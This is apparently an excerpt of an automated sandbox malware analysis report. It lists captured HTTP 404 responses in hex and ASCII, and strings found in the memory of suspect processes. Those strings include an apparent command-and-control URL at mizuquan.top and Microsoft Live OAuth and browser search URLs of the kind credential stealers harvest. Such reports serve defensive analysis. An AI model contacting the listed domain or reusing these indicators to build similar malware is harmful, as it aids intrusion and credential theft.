3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 14:35:24 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 14:35:26 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 14:35:29 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 14:35:34 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 14:35:37 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 14:35:40 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 14:35:42 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 14:36:16 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 14:36:18 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 14:36:21 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 14:36:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: IqZHJpXEsts.exe, 00000007.00000002.3641350832.000000000522C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mizuquan.top
            Source: IqZHJpXEsts.exe, 00000007.00000002.3641350832.000000000522C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mizuquan.top/e0nr/
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000006.00000002.3639094585.000000000367E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000006.00000002.3639094585.000000000367E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000006.00000002.3639094585.000000000367E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000006.00000002.3639094585.000000000367E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000006.00000002.3639094585.000000000367E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000006.00000002.3639094585.000000000367E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
